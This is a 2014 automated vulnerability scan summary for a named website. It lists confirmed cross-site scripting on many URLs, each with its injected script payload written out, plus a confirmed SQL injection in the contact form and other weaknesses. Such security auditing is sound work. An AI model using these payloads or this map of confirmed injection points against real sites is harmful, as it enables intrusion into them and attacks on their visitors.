NETSPARKER SCAN REPORT SUMMARYTARGET URL http://www.shalomlaam.co.il/
SCAN DATE 20 15:41:03 2014
REPORT DATE 20 16:55:44 2014
SCAN DURATION 01:12:58
TotalRequests
59131
AverageSpeed
13.51req/sec.
268identified
158confirmed
10critical
95informational
SCAN SETTINGSENABLEDENGINES
Static Tests, Find Backup Files, SQL Injection,Boolean SQL Injection, Blind SQL Injection, Cross-siteScripting, Command Injection, Blind Command Injection,Local File Inclusion, Remote File Inclusion, RemoteCode Evaluation, HTTP Header Injection, OpenRedirection, Expression Language Injection
Authentication
Scheduled
VULNERABILITIESCRITICAL4%
IMPORTANT
57%MEDIUM3%
LOW1%
INFORMATION
35%
1 / 146
VULNERABILITY SUMMARYURL Parameter Method Vulnerability Confirmed
/ [Possible]InternalPathLeakage(*nix)
No
/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DB)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/2minute/ [Possible]InternalPathLeakage(*nix)
No
/about'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004F1)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/about/ [Possible]InternalPathLeakage(*nix)
No
/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013C)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/about/Default.asp [Possible]InternalPathLeakage(*nix)
No
/about/reg/ QueryBased
QueryString
Cross-siteScripting Yes
/about/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004FA)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/about/reg/maillingUpdate.asp QueryBased
QueryString
Cross-siteScripting Yes
/about/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000522)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/about/search/ QueryBased
QueryString
Cross-siteScripting Yes
/about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00052F)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/about/search/default.asp QueryBased
QueryString
Cross-siteScripting Yes
/about/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055A)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/allvideo/ [Possible]InternalPathLeakage(*nix)
No
/allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/alon/ [Possible]InternalPathLeakage(*nix)
No
/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000150)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/alon/archive.asp [Possible]InternalPathLeakage(*nix)
No
/alon/Default.asp [Possible]InternalPathLeakage(*nix)
No
/alon/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043A)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/alon/list.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000156)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/alon/mador.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/alon/musag.asp [Possible]InternalPathLeakage(*nix)
No
/alon/musag.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
2 / 146
/ask'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00017C)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/ rabbi GET Cross-siteScripting Yes
cat GET Cross-siteScripting Yes
search POST Cross-siteScripting Yes
[Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000149)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/answer.asp ProgrammingErrorMessage
No
[Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000195)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/ask_rabbi.asp [Possible]InternalPathLeakage(*nix)
No
/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000584)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/Default.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/ask/reg/ QueryBased
QueryString
Cross-siteScripting Yes
/ask/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00062A)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/reg/maillingUpdate.asp QueryBased
QueryString
Cross-siteScripting Yes
/ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000642)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000646)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/banner/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057B)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/bmidrash/ [Possible]InternalPathLeakage(*nix)
No
/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/bmidrash/answer.asp [Possible]InternalPathLeakage(*nix)
No
/bmidrash/bprint.asp [Possible]InternalPathLeakage(*nix)
No
/bmidrash/Default.asp [Possible]InternalPathLeakage(*nix)
No
/bmidrash/list.asp [Possible]InternalPathLeakage(*nix)
No
/bmidrash/mekorot.asp [Possible]InternalPathLeakage(*nix)
No
/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015B)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/Branches/snif.asp [Possible]InternalPathLeakage(*nix)
No
/Branches/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000204)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
3 / 146
/contact/ name_id POST SQLInjection Yes
sendFrom POST [Probable]SQLInjection
No
name POST [Probable]SQLInjection
No
phone POST [Probable]SQLInjection
No
subject POST [Probable]SQLInjection
No
f_name POST [Probable]SQLInjection
No
name_id POST [Probable]SQLInjection
No
MSSQLVersionIsOutOfDate
No
MicrosoftSQLServerIdentified
Yes
E-mailAddressDisclosure
No
[Possible]InternalPathLeakage(*nix)
No
/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000138)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/contact/Default.asp [Possible]InternalPathLeakage(*nix)
No
/contact/reg/ QueryBased
QueryString
Cross-siteScripting Yes
/contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/contact/reg/maillingUpdate.asp QueryBased
QueryString
Cross-siteScripting Yes
/contact/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000498)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/contact/search/ QueryBased
QueryString
Cross-siteScripting Yes
/contact/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004A9)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/contact/search/default.asp QueryBased
QueryString
Cross-siteScripting Yes
/contact/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004D2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/crossdomain.xml OpenPolicyCrossdomain.xmlIdentified
Yes
/Default.asp [Possible]InternalPathLeakage(*nix)
No
/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000216)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gallery/ [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014F)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gallery/branches.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
4 / 146
/gallery/Default.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/gallery/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00026D)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gallery/snifim.asp [Possible]InternalPathLeakage(*nix)
No
/gallery/upload_img.asp FileUploadFunctionalityIdentified
Yes
[Possible]InternalPathLeakage(*nix)
No
/gvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000115)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000134)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/js/swfaddress.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000445)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/js/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043D)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00044E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/style/style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000452)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/testimonialrotator/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000446)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/testimonialrotator/testimonialrotator.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000455)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/testimonialrotator/testimonialrotator.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000449)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/hagim/ [Possible]InternalPathLeakage(*nix)
No
/hagim/3shavuot.asp [Possible]InternalPathLeakage(*nix)
No
/home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/home/1.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000119)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/images/ InternalServerError Yes
/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000105)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/images/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E9)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/images/pagetop.asp QueryBased
QueryString
Cross-siteScripting Yes
/images/pagetop.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E6)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/jAccordion/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000127)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/jAccordion/jquery.easing.1.3.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F5)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/jAccordion/jquery.jAccordion-1.2.1.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F9)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/ ForbiddenResource Yes
/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
5 / 146
/js/+%20win%20+ QueryBased
QueryString
Cross-siteScripting Yes
/js/+%20win%20+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000409)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/AC_RunActiveContent.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DF)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/delate_image.asp QueryBased
QueryString
Cross-siteScripting Yes
/js/delate_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003CE)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/func_site.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DC)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/getbanner.asp QueryBased
QueryString
Cross-siteScripting Yes
/js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E5)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/HebDate.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E5)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/images/ QueryBased
QueryString
Cross-siteScripting Yes
/js/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040C)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/top1.htm QueryBased
QueryString
Cross-siteScripting Yes
/js/top1.htm'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003C2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/upload_image.asp QueryBased
QueryString
Cross-siteScripting Yes
/js/upload_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003AF)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/kaftorim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/komiks/ [Possible]InternalPathLeakage(*nix)
No
/komiks/Default.asp [Possible]InternalPathLeakage(*nix)
No
/l/ [Possible]InternalPathLeakage(*nix)
No
/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/l/agrala_miadim.asp [Possible]InternalPathLeakage(*nix)
No
/l/agrala_sheelot.asp [Possible]InternalPathLeakage(*nix)
No
/l/agrala_takanon.asp [Possible]InternalPathLeakage(*nix)
No
/l/agrala_tozaot.asp [Possible]InternalPathLeakage(*nix)
No
/l/Default.asp [Possible]InternalPathLeakage(*nix)
No
/lessons/ yom POST [Probable]SQLInjection
No
[Possible]InternalPathLeakage(*nix)
No
/lessons/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A8)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/lessons/default.asp yom POST [Probable]SQLInjection
No
[Possible]InternalPathLeakage(*nix)
No
/LIVE/ [Possible]InternalPathLeakage(*nix)
No
/LIVE/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019D)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
6 / 146
/live/form_live.asp [Possible]InternalPathLeakage(*nix)
No
/maillingUpdate.asp QueryBased
QueryString
Cross-siteScripting Yes
/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000210)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/news/ [Possible]InternalPathLeakage(*nix)
No
/news/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000400)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/news/Default.asp [Possible]InternalPathLeakage(*nix)
No
/page/ [Possible]InternalPathLeakage(*nix)
No
/page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pages/ [Possible]InternalPathLeakage(*nix)
No
/pages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F1)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pages/Default.asp [Possible]InternalPathLeakage(*nix)
No
/pages/page.asp [Possible]InternalPathLeakage(*nix)
No
/pages/page.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021B)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pagetop.asp [Possible]InternalPathLeakage(*nix)
No
/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011F)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013F)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pitgam/ [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045B)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pitgam/Default.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/Presentation/ [Possible]InternalPathLeakage(*nix)
No
/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/Presentation/Default.asp [Possible]InternalPathLeakage(*nix)
No
/reg/ email POST [Probable]SQLInjection
No
[Possible]InternalPathLeakage(*nix)
No
/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B9)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/reg/Default.asp [Possible]InternalPathLeakage(*nix)
No
7 / 146
/reg/login.asp PasswordTransmittedOverHTTP
Yes
AutoCompleteEnabled
Yes
[Possible]InternalPathLeakage(*nix)
No
/reg/maillingUpdate.asp DatabaseErrorMessage
No
[Possible]InternalPathLeakage(*nix)
No
/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D5)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/reg/reg.asp [Possible]InternalPathLeakage(*nix)
No
/scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FD)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/scripts/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FF)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/search/ [Possible]InternalPathLeakage(*nix)
No
/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/search/default.asp q GET Cross-siteScripting Yes
[Possible]InternalPathLeakage(*nix)
No
/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DA)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/sh/ [Possible]InternalPathLeakage(*nix)
No
/sh/default.asp [Possible]InternalPathLeakage(*nix)
No
/sipur/ [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/sipur/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A0)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/sipur/Default.asp [Possible]InternalPathLeakage(*nix)
No
/sipur/page.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/sipur/send_sipur.asp [Possible]InternalPathLeakage(*nix)
No
/site/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000106)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00012E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/alon/archive.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00029F)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/alon/list.asp CatID GET HTTPHeaderInjection
No
/site/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000131)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/ask/ CatID GET HTTPHeaderInjection
No
/site/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000298)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
8 / 146
/site/ask/answer.asp id GET HTTPHeaderInjection
No
/site/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000302)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/ask/answer_print.asp [Possible]InternalPathLeakage(Windows)
No
/site/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AD)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/bmidrash/answer.asp id GET HTTPHeaderInjection
No
/site/bmidrash/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00037E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/bmidrash/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00033E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/bmidrash/mekorot.asp id GET HTTPHeaderInjection
No
/site/bmidrash/mekorot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000386)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A1)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028A)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AE)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/gallery/ IISVersionDisclosure
No
/site/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E8)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/gallery/highslide/highslide.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000123)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/gallery/highslide/highslide-full.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C4)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/l/agrala_miadim.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00038E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/l/agrala_sheelot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000397)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/l/agrala_takanon.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000393)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/l/agrala_tozaot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A5)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/pitgam/ CatID GET HTTPHeaderInjection
No
/site/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000293)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002DC)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00027E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/reg/login.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000283)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/reg/reg.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/uploadimages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B4)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
9 / 146
/site/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B1)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/sitemap.xml SitemapIdentified No
/snif.asp QueryBased
QueryString
Cross-siteScripting Yes
/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000234)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/tags/ q GET Cross-siteScripting Yes
[Possible]InternalPathLeakage(*nix)
No
/tags/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BB)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/tags/tags.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/UploadImages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000109)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/uploadimages/2011_8_22_13_2_45.JPG'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000573)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/video/ [Possible]InternalPathLeakage(*nix)
No
/video/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CE)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/video/Default.asp [Possible]InternalPathLeakage(*nix)
No
/vod/ [Possible]InternalPathLeakage(*nix)
No
/vod/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/vod/vod.asp id GET Cross-siteScripting Yes
[Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/vod/vod.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000160)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AF)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
10 / 146
1 TOTALCRITICALCONFIRMED
1
1. SQL InjectionSQLInjectionoccurswhendatainputforexamplebyauserisinterpretedasaSQLcommandratherthannormaldatabythebackenddatabase.Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications.NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLQueryontheback-enddatabase.
{PRODUCT}identifiedanSQLinjection,whichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase.
